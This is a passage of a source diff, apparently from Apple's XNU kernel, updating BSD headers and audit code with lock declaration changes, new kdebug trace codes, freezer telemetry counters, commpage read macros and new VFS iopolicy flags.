b/bsd/security/audit/audit_mac.c @@ -85,7 +85,10 @@ audit_mac_new(proc_t p, struct kaudit_record *ar) } mac.m_buflen = MAC_AUDIT_LABEL_LEN; mac.m_string = ar->k_ar.ar_cred_mac_labels; - mac_cred_label_externalize_audit(p, &mac); + if (mac_cred_label_externalize_audit(p, &mac)) { + zfree(audit_mac_label_zone, ar->k_ar.ar_cred_mac_labels); + return 1; + } /* * grab space for the reconds. 
diff --git a/bsd/security/audit/audit_session.c b/bsd/security/audit/audit_session.c index 80290b43c..f9345c4e6 100644 --- a/bsd/security/audit/audit_session.c +++ b/bsd/security/audit/audit_session.c @@ -102,7 +102,7 @@ static au_sentry_t audit_default_se = { struct auditinfo_addr * const audit_default_aia_p = &audit_default_se.se_auinfo; /* Copied from */ -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 +#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t, mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t); void ipc_port_release_send(ipc_port_t); @@ -1517,7 +1517,7 @@ audit_session_join(proc_t p, struct audit_session_join_args *uap, if (ipc_object_copyin(get_task_ipcspace(p->task), send, - MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) { + MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) { *ret_asid = AU_DEFAUDITSID; err = EINVAL; } else { diff --git a/bsd/sys/buf.h b/bsd/sys/buf.h index f46094803..92e5fe42f 100644 --- a/bsd/sys/buf.h +++ b/bsd/sys/buf.h @@ -1036,6 +1036,22 @@ void bufattr_markioscheduled(bufattr_t bap); */ int bufattr_ioscheduled(bufattr_t bap); +/*! + * @function bufattr_markexpeditedmeta + * @abstract Mark a metadata I/O buffer as expedited (i.e. requires a high I/O tier). + * @param bap Buffer attributes to mark. + * @discussion Marks the buffer so that spec_strategy() will know that it should be expedited + */ +void bufattr_markexpeditedmeta(bufattr_t bap); + +/*! + * @function bufattr_expeditedmeta + * @abstract Check if a buffer is marked as expedited metadata I/O. + * @param bap Buffer attributes to test. + * @return Nonzero if the buffer is marked expedited metadata I/O, 0 otherwise. 
+ */ +int bufattr_expeditedmeta(bufattr_t bap); + #ifdef KERNEL_PRIVATE void buf_setfilter(buf_t, void (*)(buf_t, void *), void *, void(**)(buf_t, void *), void **); diff --git a/bsd/sys/buf_internal.h b/bsd/sys/buf_internal.h index 279f5f8b0..beddcdbe4 100644 --- a/bsd/sys/buf_internal.h +++ b/bsd/sys/buf_internal.h @@ -167,7 +167,7 @@ extern vm_offset_t buf_kernel_addrperm; /* * These flags are kept in b_lflags... - * buf_mtxp must be held before examining/updating + * buf_mtx must be held before examining/updating */ #define BL_BUSY 0x00000001 /* I/O in progress. */ #define BL_WANTED 0x00000002 /* Process wants this buffer. */ @@ -273,6 +273,7 @@ extern vm_offset_t buf_kernel_addrperm; #define BA_STRATEGY_TRACKED_IO 0x00002000 /* tracked by spec_strategy */ #define BA_IO_TIER_UPGRADE 0x00004000 /* effective I/O tier is higher than BA_IO_TIER */ #define BA_IO_SCHEDULED 0x00008000 /* buf is associated with a mount point that is io scheduled */ +#define BA_EXPEDITED_META_IO 0x00010000 /* metadata I/O which needs a high I/O tier */ #define GET_BUFATTR_IO_TIER(bap) ((bap->ba_flags & BA_IO_TIER_MASK) >> BA_IO_TIER_SHIFT) #define SET_BUFATTR_IO_TIER(bap, tier) \ diff --git a/bsd/sys/commpage.h b/bsd/sys/commpage.h index ccdd50949..f0c627f8e 100644 --- a/bsd/sys/commpage.h +++ b/bsd/sys/commpage.h @@ -41,6 +41,56 @@ typedef volatile struct commpage_timeofday_data { uint64_t Ticks_per_sec; } new_commpage_timeofday_data_t; +/*! + * @macro COMM_PAGE_SLOT_TYPE + * + * @brief + * Macro that expands to the proper type for a pointer to a commpage slot, + * to be used in a local variable declaration. + * + * @description + * Usage is something like: + * + * COMM_PAGE_SLOT_TYPE(uint64_t) slot = COMM_PAGE_SLOT(uint64_t, FOO); + * + * + * @param type The scalar base type for the slot. 
+ */ +#if __has_feature(address_sanitizer) +#define COMM_PAGE_SLOT_TYPE(type_t) type_t __attribute__((address_space(1))) volatile * +#else +#define COMM_PAGE_SLOT_TYPE(type_t) type_t volatile * +#endif + +/*! + * @macro COMM_PAGE_SLOT + * + * @brief + * Macro that expands to the properly typed address for a commpage slot. + * + * @param type The scalar base type for the slot. + * @param name The slot name, without its @c _COMM_PAGE_ prefix. + */ +#define COMM_PAGE_SLOT(type_t, name) ((COMM_PAGE_SLOT_TYPE(type_t))_COMM_PAGE_##name) + +/*! + * @macro COMM_PAGE_READ + * + * @brief + * Performs a single read from the commpage in a way that doesn't trip + * address sanitizers. + * + * @description + * Typical use looks like this: + * + * uint64_t foo_value = COMM_PAGE_READ(uint64_t, FOO); + * + * + * @param type The scalar base type for the slot. + * @param name The slot name, without its @c _COMM_PAGE_ prefix. + */ +#define COMM_PAGE_READ(type_t, slot) (*(COMM_PAGE_SLOT(type_t, slot))) + #endif #endif diff --git a/bsd/sys/conf.h b/bsd/sys/conf.h index 0fb01991f..24a1c08fc 100644 --- a/bsd/sys/conf.h +++ b/bsd/sys/conf.h @@ -206,14 +206,6 @@ extern uint64_t cdevsw_flags[]; #define CDEVSW_IS_PTS 0x08 struct thread; - -typedef struct devsw_lock { - TAILQ_ENTRY(devsw_lock) dl_list; - struct thread *dl_thread; - dev_t dl_dev; - int dl_mode; -} *devsw_lock_t; - #endif /* BSD_KERNEL_PRIVATE */ @@ -295,7 +287,6 @@ extern struct swdevt swdevt[]; */ __BEGIN_DECLS #ifdef KERNEL_PRIVATE -void devsw_init(void); extern struct cdevsw cdevsw[]; extern int cdevsw_setkqueueok(int, const struct cdevsw*, int); #endif /* KERNEL_PRIVATE */ diff --git a/bsd/sys/dtrace_impl.h b/bsd/sys/dtrace_impl.h index bb70011d2..e1ab6a060 100644 --- a/bsd/sys/dtrace_impl.h +++ b/bsd/sys/dtrace_impl.h @@ -50,6 +50,8 @@ extern "C" { /* * DTrace Implementation Locks */ +extern lck_attr_t dtrace_lck_attr; +extern lck_grp_t dtrace_lck_grp; extern lck_mtx_t dtrace_procwaitfor_lock; /* @@ -1395,7 +1397,6 @@ 
extern void dtrace_probe_error(dtrace_state_t *, dtrace_epid_t, int, int, extern int dtrace_assfail(const char *, const char *, int); extern int dtrace_attached(void); extern hrtime_t dtrace_gethrestime(void); -extern void dtrace_isa_init(void); extern void dtrace_flush_caches(void); diff --git a/bsd/sys/event.h b/bsd/sys/event.h index cd76a0528..21552dd6b 100644 --- a/bsd/sys/event.h +++ b/bsd/sys/event.h @@ -676,10 +676,6 @@ SLIST_HEAD(klist, knote); #include /* panic */ #include -#ifdef MALLOC_DECLARE -MALLOC_DECLARE(M_KQUEUE); -#endif - LIST_HEAD(knote_list, knote); TAILQ_HEAD(kqtailq, knote); /* a list of "queued" events */ diff --git a/bsd/sys/eventhandler.h b/bsd/sys/eventhandler.h index 307546942..0f8ae79fc 100644 --- a/bsd/sys/eventhandler.h +++ b/bsd/sys/eventhandler.h @@ -65,8 +65,8 @@ #include extern int evh_debug; -extern lck_grp_t *el_lock_grp; -extern lck_attr_t *el_lock_attr; +extern lck_grp_t el_lock_grp; +extern lck_attr_t el_lock_attr; extern struct eventhandler_entry_arg eventhandler_entry_dummy_arg; struct eventhandler_lists_ctxt { @@ -101,13 +101,13 @@ struct eventhandler_list { typedef struct eventhandler_entry *eventhandler_tag; -#define EHL_LOCK_INIT(p) lck_mtx_init(&(p)->el_lock, el_lock_grp, el_lock_attr) +#define EHL_LOCK_INIT(p) lck_mtx_init(&(p)->el_lock, &el_lock_grp, &el_lock_attr) #define EHL_LOCK(p) lck_mtx_lock(&(p)->el_lock) #define EHL_LOCK_SPIN(p) lck_mtx_lock_spin(&(p)->el_lock) #define EHL_LOCK_CONVERT(p) lck_mtx_convert_spin(&(p)->el_lock) #define EHL_UNLOCK(p) lck_mtx_unlock(&(p)->el_lock) #define EHL_LOCK_ASSERT(p, x) LCK_MTX_ASSERT(&(p)->el_lock, x) -#define EHL_LOCK_DESTROY(p) lck_mtx_destroy(&(p)->el_lock, el_lock_grp) +#define EHL_LOCK_DESTROY(p) lck_mtx_destroy(&(p)->el_lock, &el_lock_grp) #define evhlog(x) do { if (evh_debug >= 1) log x; } while (0) diff --git a/bsd/sys/imageboot.h b/bsd/sys/imageboot.h index 07299c21d..3c961ab23 100644 --- a/bsd/sys/imageboot.h +++ b/bsd/sys/imageboot.h @@ -1,5 +1,5 @@ /* - * 
Copyright (c) 2006-2010 Apple Inc. All rights reserved. + * Copyright (c) 2006-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -42,7 +42,8 @@ bool imageboot_desired(void); void imageboot_setup(imageboot_type_t type); int imageboot_format_is_valid(const char *root_path); int imageboot_mount_image(const char *root_path, int height, imageboot_type_t type); -int imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, const char *outgoing_root_path, const bool rooted_dmg); +int imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, + const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check); int imageboot_read_file(struct kalloc_heap *kheap, const char *path, void **bufp, size_t *bufszp); int imageboot_read_file_from_offset(struct kalloc_heap *kheap, const char *path, off_t offset, void **bufp, size_t *bufszp); diff --git a/bsd/sys/kasl.h b/bsd/sys/kasl.h index 1320d65be..e11b773cb 100644 --- a/bsd/sys/kasl.h +++ b/bsd/sys/kasl.h @@ -40,7 +40,6 @@ extern int kern_asl_msg(int level, const char *facility, size_t num_pairs, ...); extern int escape_str(char *str, size_t len, size_t buflen); -extern void fpxlog_init(void); extern void fpxlog(int, uint32_t, uint32_t, uint32_t); #endif /* !_SYS_KASL_H_ */ diff --git a/bsd/sys/kauth.h b/bsd/sys/kauth.h index 66cb12e92..3c6cd105c 100644 --- a/bsd/sys/kauth.h +++ b/bsd/sys/kauth.h @@ -782,15 +782,19 @@ void kprintf(const char *fmt, ...); /* * Initialisation. */ -extern lck_grp_t *kauth_lck_grp; #ifdef XNU_KERNEL_PRIVATE __BEGIN_DECLS + +extern lck_grp_t kauth_lck_grp; + extern void kauth_init(void); extern void kauth_cred_init(void); +/* + * If you need accounting for KM_KAUTH consider using + * KALLOC_HEAP_DEFINE to define a view. 
+ */ +#define KM_KAUTH KHEAP_DEFAULT #if CONFIG_EXT_RESOLVER -extern void kauth_identity_init(void); -extern void kauth_groups_init(void); -extern void kauth_resolver_init(void); extern void kauth_resolver_identity_reset(void); #endif __END_DECLS diff --git a/bsd/sys/kdebug.h b/bsd/sys/kdebug.h index f45871353..3fbe03b94 100644 --- a/bsd/sys/kdebug.h +++ b/bsd/sys/kdebug.h @@ -182,6 +182,7 @@ __BEGIN_DECLS #define DBG_MACH_SCHED_CLUTCH 0xA9 /* Clutch scheduler */ #define DBG_MACH_IO 0xAA /* I/O */ #define DBG_MACH_WORKGROUP 0xAB /* Workgroup subsystem */ +#define DBG_MACH_HV 0xAC /* Hypervisor subsystem */ /* Codes for DBG_MACH_IO */ #define DBC_MACH_IO_MMIO_READ 0x1 @@ -260,6 +261,8 @@ __BEGIN_DECLS #define MACH_TURNSTILE_KERNEL_CHANGE 0x40 /* sched priority change because of turnstile */ #define MACH_SCHED_WI_AUTO_JOIN 0x41 /* work interval auto join events */ #define MACH_SCHED_WI_DEFERRED_FINISH 0x42 /* work interval pending finish events for auto-join thread groups */ +#define MACH_SET_RT_DEADLINE 0x43 /* set thread->realtime.deadline */ +#define MACH_CANCEL_RT_DEADLINE 0x44 /* cancel thread->realtime.deadline */ #define MACH_PSET_AVG_EXEC_TIME 0x50 /* Codes for Clutch/Edge Scheduler (DBG_MACH_SCHED_CLUTCH) */ @@ -360,6 +363,13 @@ __BEGIN_DECLS #define PMAP__UPDATE_CACHING 0x15 #define PMAP__ATTRIBUTE_CLEAR_RANGE 0x16 #define PMAP__CLEAR_USER_TTB 0x17 +#define PMAP__IOMMU_INIT 0x18 +#define PMAP__IOMMU_IOVMALLOC 0x19 +#define PMAP__IOMMU_IOVMFREE 0x1a +#define PMAP__IOMMU_MAP 0x1b +#define PMAP__IOMMU_UNMAP 0x1c +#define PMAP__IOMMU_IOCTL 0x1d +#define PMAP__IOMMU_GRANT_PAGE 0x1e /* Codes for clock (DBG_MACH_CLOCK) */ #define MACH_EPOCH_CHANGE 0x0 /* wake epoch change */ @@ -420,6 +430,10 @@ __BEGIN_DECLS #define RMON_LOGWRITES_VIOLATED_K32B 0x025 #define RMON_DISABLE_IO_MONITOR 0x02f +/* Codes for Hypervisor (DBG_MACH_HV) */ +#define HV_GUEST_ENTER 0x000 +#define HV_GUEST_ERROR 0x001 + /* **** The Kernel Debug Sub Classes for Network (DBG_NETWORK) **** */ 
#define DBG_NETIP 1 /* Internet Protocol */ #define DBG_NETARP 2 /* Address Resolution Protocol */ @@ -570,6 +584,11 @@ __BEGIN_DECLS #define DBG_HFS_UPDATE_MINOR 0x40 #define DBG_HFS_UPDATE_SKIPPED 0x80 +/* + * Codes for Kernel Debug Sub Class DBG_VFS + */ +#define DBG_VFS_IO_COMPRESSION_STATS 0x1000 + /* The Kernel Debug Sub Classes for BSD */ #define DBG_BSD_PROC 0x01 /* process/signals related */ #define DBG_BSD_MEMSTAT 0x02 /* memorystatus / jetsam operations */ diff --git a/bsd/sys/kern_memorystatus.h b/bsd/sys/kern_memorystatus.h index 4cbfd6b8f..8db45d65e 100644 --- a/bsd/sys/kern_memorystatus.h +++ b/bsd/sys/kern_memorystatus.h @@ -364,7 +364,7 @@ int memorystatus_control(uint32_t command, int32_t pid, uint32_t flags, void *bu #define MEMORYSTATUS_CMD_INCREASE_JETSAM_TASK_LIMIT 22 /* Used by DYLD to increase the jetsam active and inactive limits, when using roots */ #if PRIVATE -#define MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP 23 /* Used by unit tests in the development kernel only. */ +#define MEMORYSTATUS_CMD_SET_TESTING_PID 23 /* Used by unit tests in the development kernel only. */ #endif /* PRIVATE */ #define MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN 24 /* Check if the process is frozen. */ @@ -402,8 +402,8 @@ typedef struct memorystatus_jetsam_panic_options { #define MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY 0x10 /* Set probability of use for a group of processes */ #if PRIVATE -#define MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP 0x20 /* Only used by xnu unit tests. */ -#define MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP 0x40 /* Only used by xnu unit tests. */ +#define MEMORYSTATUS_FLAGS_SET_TESTING_PID 0x20 /* Only used by xnu unit tests. */ +#define MEMORYSTATUS_FLAGS_UNSET_TESTING_PID 0x40 /* Only used by xnu unit tests. 
*/ #endif /* PRIVATE */ #define MEMORYSTATUS_FLAGS_SNAPSHOT_FREEZER 0x80 /* A snapshot buffer containing app kills since last consumption */ diff --git a/bsd/sys/kern_memorystatus_freeze.h b/bsd/sys/kern_memorystatus_freeze.h index dd01e09ce..c962d0949 100644 --- a/bsd/sys/kern_memorystatus_freeze.h +++ b/bsd/sys/kern_memorystatus_freeze.h @@ -58,6 +58,7 @@ extern unsigned int memorystatus_freeze_private_shared_pages_ratio; /* Ratio of extern unsigned int memorystatus_suspended_count; extern unsigned int memorystatus_thaw_count; /* # of processes that have been thawed in the current interval. */ extern unsigned int memorystatus_refreeze_eligible_count; /* # of processes currently thawed i.e. have state on disk & in-memory */ +extern uint32_t memorystatus_freeze_current_interval; /* Monotonically increasing interval id. */ void memorystatus_freeze_init(void); extern int memorystatus_freeze_process_sync(proc_t p); @@ -115,6 +116,67 @@ int memorystatus_freezer_control(int32_t flags, user_addr_t buffer, size_t buffe void memorystatus_freeze_init_proc(proc_t p); errno_t memorystatus_get_process_is_frozen(pid_t pid, int *is_freezable); +/* Freezer counters collected for telemetry */ +struct memorystatus_freezer_stats_t { + /* + * # of processes that we've considered freezing. + * Used to normalize the error reasons below. + */ + uint64_t mfs_process_considered_count; + + /* + * The following counters track how many times we've failed to freeze + * a process because of a specific FREEZER_ERROR. + */ + /* EXCESS_SHARED_MEMORY */ + uint64_t mfs_error_excess_shared_memory_count; + /* LOW_PRIVATE_SHARED_RATIO */ + uint64_t mfs_error_low_private_shared_ratio_count; + /* NO_COMPRESSOR_SPACE */ + uint64_t mfs_error_no_compressor_space_count; + /* NO_SWAP_SPACE */ + uint64_t mfs_error_no_swap_space_count; + /* pages < memorystatus_freeze_pages_min */ + uint64_t mfs_error_below_min_pages_count; + /* dasd determined it was unlikely to be relaunched. 
*/ + uint64_t mfs_error_low_probability_of_use_count; + /* transient reasons (like inability to acquire a lock). */ + uint64_t mfs_error_other_count; + + /* + * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold. + * Used to normalize skipped_full_count and shared_mb_high_count. + */ + uint64_t mfs_below_threshold_count; + + /* Skipped running the freezer because we were out of slots */ + uint64_t mfs_skipped_full_count; + + /* Skipped running the freezer because we were over the shared mb limit */ + uint64_t mfs_skipped_shared_mb_high_count; + + /* + * How many pages have not been sent to swap because they were in a shared object? + * This is being used to gather telemetry so we can understand the impact we'd have + * on our NAND budget if we did swap out these pages. + */ + uint64_t mfs_shared_pages_skipped; + + /* + * A running sum of the total number of bytes sent to NAND during + * refreeze operations since boot. + */ + uint64_t mfs_bytes_refrozen; + /* The number of refreeze operations since boot */ + uint64_t mfs_refreeze_count; + + /* The number of processes which have been frozen at least once in the current interval. */ + uint64_t mfs_processes_frozen; + /* The number of processes which have been thawed at least once in the current interval. 
*/ + uint64_t mfs_processes_thawed; +}; +extern struct memorystatus_freezer_stats_t memorystatus_freezer_stats; + #endif /* CONFIG_FREEZE */ #endif /* XNU_KERNEL_PRIVATE */ diff --git a/bsd/sys/lockf.h b/bsd/sys/lockf.h index 574ef7a70..8dc82f313 100644 --- a/bsd/sys/lockf.h +++ b/bsd/sys/lockf.h @@ -69,10 +69,6 @@ struct vnop_advlock_args; struct vnode; -#ifdef MALLOC_DECLARE -MALLOC_DECLARE(M_LOCKF); -#endif - #if IMPORTANCE_INHERITANCE #define LF_NOT_BOOSTED 0 #define LF_BOOSTED 1 diff --git a/bsd/sys/malloc.h b/bsd/sys/malloc.h index 4bf21625f..62c2a4085 100644 --- a/bsd/sys/malloc.h +++ b/bsd/sys/malloc.h @@ -144,6 +144,12 @@ ZONE_VIEW_DECLARE(ZV_NAMEI); #define M_LAST 129 /* Must be last type + 1 */ +/* + * If you need accounting consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_SHM KHEAP_DEFAULT + #define MALLOC(space, cast, size, type, flags) \ ({ VM_ALLOC_SITE_STATIC(0, 0); \ (space) = (cast)__MALLOC(size, type, flags, &site); }) diff --git a/bsd/sys/mbuf.h b/bsd/sys/mbuf.h index 0e8be447e..802e54672 100644 --- a/bsd/sys/mbuf.h +++ b/bsd/sys/mbuf.h @@ -694,6 +694,9 @@ struct mbuf { /* checksum start adjustment has been done */ #define CSUM_ADJUST_DONE 0x00020000 +/* VLAN encapsulation present */ +#define CSUM_VLAN_ENCAP_PRESENT 0x00040000 /* mbuf has vlan encapsulation */ + /* TCP Segment Offloading requested on this mbuf */ #define CSUM_TSO_IPV4 0x00100000 /* This mbuf needs to be segmented by the NIC */ #define CSUM_TSO_IPV6 0x00200000 /* This mbuf needs to be segmented by the NIC */ @@ -1079,6 +1082,7 @@ struct mbstat { u_int32_t m_bigclusters; /* clusters obtained from page pool */ u_int32_t m_bigclfree; /* free clusters */ u_int32_t m_bigmclbytes; /* length of an mbuf cluster */ + u_int32_t m_forcedefunct; /* times we force defunct'ed an app's sockets */ }; /* Compatibillity with 10.3 */ diff --git a/bsd/sys/mcache.h b/bsd/sys/mcache.h index 243965bd7..4fd209c37 100644 --- a/bsd/sys/mcache.h +++ b/bsd/sys/mcache.h @@ -306,23 
+306,17 @@ typedef struct mcache { u_int32_t mc_nwretry_cnt; /* # of no-wait retry attempts */ u_int32_t mc_nwfail_cnt; /* # of no-wait retries that failed */ decl_lck_mtx_data(, mc_sync_lock); /* protects purges and reenables */ - lck_attr_t *mc_sync_lock_attr; lck_grp_t *mc_sync_lock_grp; - lck_grp_attr_t *mc_sync_lock_grp_attr; /* * Keep CPU and buckets layers lock statistics separate. */ - lck_attr_t *mc_cpu_lock_attr; lck_grp_t *mc_cpu_lock_grp; - lck_grp_attr_t *mc_cpu_lock_grp_attr; /* * Bucket layer common to all CPUs */ decl_lck_mtx_data(, mc_bkt_lock); - lck_attr_t *mc_bkt_lock_attr; lck_grp_t *mc_bkt_lock_grp; - lck_grp_attr_t *mc_bkt_lock_grp_attr; mcache_bkttype_t *cache_bkttype; /* bucket type */ mcache_bktlist_t mc_full; /* full buckets */ mcache_bktlist_t mc_empty; /* empty buckets */ @@ -357,6 +351,8 @@ typedef struct mcache { #define MCA_TRN_MAX 2 /* Number of transactions to record */ +#define DUMP_MCA_BUF_SIZE 512 + typedef struct mcache_audit { struct mcache_audit *mca_next; /* next audit struct */ void *mca_addr; /* address of buffer */ @@ -404,7 +400,7 @@ __private_extern__ void mcache_audit_free_verify(mcache_audit_t *, void *, size_t, size_t); __private_extern__ void mcache_audit_free_verify_set(mcache_audit_t *, void *, size_t, size_t); -__private_extern__ char *mcache_dump_mca(mcache_audit_t *); +__private_extern__ char *mcache_dump_mca(char buf[DUMP_MCA_BUF_SIZE], mcache_audit_t *); __private_extern__ void mcache_audit_panic(mcache_audit_t *, void *, size_t, int64_t, int64_t) __abortlike; diff --git a/bsd/sys/mman.h b/bsd/sys/mman.h index a6e093f59..4ec0f06f3 100644 --- a/bsd/sys/mman.h +++ b/bsd/sys/mman.h @@ -288,7 +288,6 @@ __END_DECLS #else /* KERNEL */ #ifdef XNU_KERNEL_PRIVATE void pshm_cache_init(void); /* for bsd_init() */ -void pshm_lock_init(void); /* * XXX routine exported by posix_shm.c, but never used there, only used in diff --git a/bsd/sys/monotonic.h b/bsd/sys/monotonic.h index 6ec648972..bbf766904 100644 --- 
a/bsd/sys/monotonic.h +++ b/bsd/sys/monotonic.h @@ -176,7 +176,7 @@ __BEGIN_DECLS #define MT_KDBG_TMPTH_START(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_START) #define MT_KDBG_TMPTH_END(CODE) MT_KDBG_TMPTH_(CODE, DBG_FUNC_END) -extern lck_grp_t * mt_lock_grp; +extern lck_grp_t mt_lock_grp; int mt_dev_init(void); diff --git a/bsd/sys/mount.h b/bsd/sys/mount.h index 6ff9616b3..f9b9a1480 100644 --- a/bsd/sys/mount.h +++ b/bsd/sys/mount.h @@ -1334,6 +1334,7 @@ void * vfs_mntlabel(mount_t mp); /* Safe to cast to "struct label*"; returns "v void vfs_setcompoundopen(mount_t mp); uint64_t vfs_throttle_mask(mount_t mp); int vfs_isswapmount(mount_t mp); +int vfs_context_dataless_materialization_is_prevented(vfs_context_t); boolean_t vfs_context_is_dataless_manipulator(vfs_context_t); boolean_t vfs_context_can_resolve_triggers(vfs_context_t); void vfs_setmntsystem(mount_t mp); diff --git a/bsd/sys/mount_internal.h b/bsd/sys/mount_internal.h index 2af3a1283..f3f0526a4 100644 --- a/bsd/sys/mount_internal.h +++ b/bsd/sys/mount_internal.h @@ -474,7 +474,7 @@ typedef uint32_t vfs_switch_root_flags_t; int vfs_switch_root(const char *, const char *, vfs_switch_root_flags_t); int vfs_mountroot(void); -void vfs_unmountall(void); +void vfs_unmountall(int only_non_system); int safedounmount(struct mount *, int, vfs_context_t); int dounmount(struct mount *, int, int, vfs_context_t); void dounmount_submounts(struct mount *, int, vfs_context_t); @@ -502,6 +502,7 @@ void mount_iterreset(mount_t); #define KERNEL_MOUNT_PREBOOTVOL 0x20 /* mount the Preboot volume */ #define KERNEL_MOUNT_RECOVERYVOL 0x40 /* mount the Recovery volume */ #define KERNEL_MOUNT_BASESYSTEMROOT 0x80 /* mount a base root volume "instead of" the full root volume (only used during bsd_init) */ +#define KERNEL_MOUNT_DEVFS 0x100 /* kernel startup mount of devfs */ /* mask for checking if any of the "mount volume by role" flags are set */ #define KERNEL_MOUNT_VOLBYROLE_MASK (KERNEL_MOUNT_DATAVOL | KERNEL_MOUNT_VMVOL | 
KERNEL_MOUNT_PREBOOTVOL | KERNEL_MOUNT_RECOVERYVOL) @@ -529,8 +530,6 @@ void rethrottle_thread(uthread_t ut); extern int num_trailing_0(uint64_t n); /* sync lock */ -extern lck_mtx_t * sync_mtx_lck; - extern int sync_timeout_seconds; extern zone_t mount_zone; diff --git a/bsd/sys/munge.h b/bsd/sys/munge.h index 43c30b05f..f714a61d9 100644 --- a/bsd/sys/munge.h +++ b/bsd/sys/munge.h @@ -169,6 +169,7 @@ void munge_wws(void *args); void munge_wwws(void *args); void munge_wwwsw(void *args); void munge_llllll(void *args); +void munge_llll(void *args); void munge_l(void *args); void munge_ll(void *args); void munge_lw(void *args); diff --git a/bsd/sys/proc.h b/bsd/sys/proc.h index 34c019cef..dadd3349d 100644 --- a/bsd/sys/proc.h +++ b/bsd/sys/proc.h @@ -87,6 +87,10 @@ #include /* COALITION_NUM_TYPES */ #endif +#ifndef KERNEL +#include +#endif + #if defined(XNU_KERNEL_PRIVATE) || !defined(KERNEL) struct session; @@ -410,6 +414,9 @@ extern boolean_t proc_is_translated(proc_t); /* true if the process ignores errors from content protection APIs */ extern bool proc_ignores_content_protection(proc_t proc); +/* true if the file system shouldn't update mtime for operations by the process */ +extern bool proc_skip_mtime_update(proc_t proc); + /*! * @function proc_exitstatus * @abstract KPI to determine a process's exit status. 
@@ -498,8 +505,10 @@ __BEGIN_DECLS int pid_suspend(int pid); int pid_resume(int pid); -int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t); -int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t); +__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3)) +int task_inspect_for_pid(unsigned int target_tport, int pid, unsigned int *t); /* Returns task inspect port */ +__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3)) +int task_read_for_pid(unsigned int target_tport, int pid, unsigned int *t); /* Returns task read port */ #if defined(__arm__) || defined(__arm64__) int pid_hibernate(int pid); diff --git a/bsd/sys/proc_internal.h b/bsd/sys/proc_internal.h index 46a610413..4c6ceb04c 100644 --- a/bsd/sys/proc_internal.h +++ b/bsd/sys/proc_internal.h @@ -404,6 +404,7 @@ struct proc { uint32_t p_memstat_freeze_sharedanon_pages; /* shared pages left behind after freeze */ uint32_t p_memstat_frozen_count; uint32_t p_memstat_thaw_count; + uint32_t p_memstat_last_thaw_interval; /* In which freezer interval was this last thawed? 
*/ #endif /* CONFIG_FREEZE */ #endif /* CONFIG_MEMORYSTATUS */ @@ -526,7 +527,10 @@ struct proc_ident { #define P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME 0x0008 #define P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE 0x0010 #define P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION 0x0020 -#define P_VFS_IOPOLICY_VALID_MASK (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION) +#define P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS 0x0040 +#define P_VFS_IOPOLICY_SKIP_MTIME_UPDATE 0x0080 +#define P_VFS_IOPOLICY_VALID_MASK (P_VFS_IOPOLICY_ATIME_UPDATES | P_VFS_IOPOLICY_FORCE_HFS_CASE_SENSITIVITY | P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES | P_VFS_IOPOLICY_STATFS_NO_DATA_VOLUME | \ + P_VFS_IOPOLICY_TRIGGER_RESOLVE_DISABLE | P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION | P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS | P_VFS_IOPOLICY_SKIP_MTIME_UPDATE) /* process creation arguments */ #define PROC_CREATE_FORK 0 /* independent child (running) */ @@ -690,8 +694,7 @@ extern unsigned int proc_shutdown_exitcount; #define PID_MAX 99999 #define NO_PID 100000 -extern lck_mtx_t * proc_list_mlock; -extern lck_mtx_t * proc_klist_mlock; +extern lck_mtx_t proc_list_mlock; #define BSD_SIMUL_EXECS 33 /* 32 , allow for rounding */ #define BSD_PAGEABLE_SIZE_PER_EXEC (NCARGS + PAGE_SIZE + PAGE_SIZE) /* page for apple vars, page for executable header */ @@ -712,16 +715,15 @@ extern u_long pgrphash; extern LIST_HEAD(sesshashhead, session) * sesshashtbl; extern u_long sesshash; -extern lck_grp_t * proc_lck_grp; -extern lck_grp_t * proc_fdmlock_grp; -extern lck_grp_t * proc_kqhashlock_grp; -extern lck_grp_t * proc_knhashlock_grp; -extern lck_grp_t * proc_mlock_grp; -extern lck_grp_t * proc_ucred_mlock_grp; -extern lck_grp_t * proc_slock_grp; -extern lck_grp_t * proc_dirslock_grp; -extern lck_grp_attr_t * proc_lck_grp_attr; -extern lck_attr_t * 
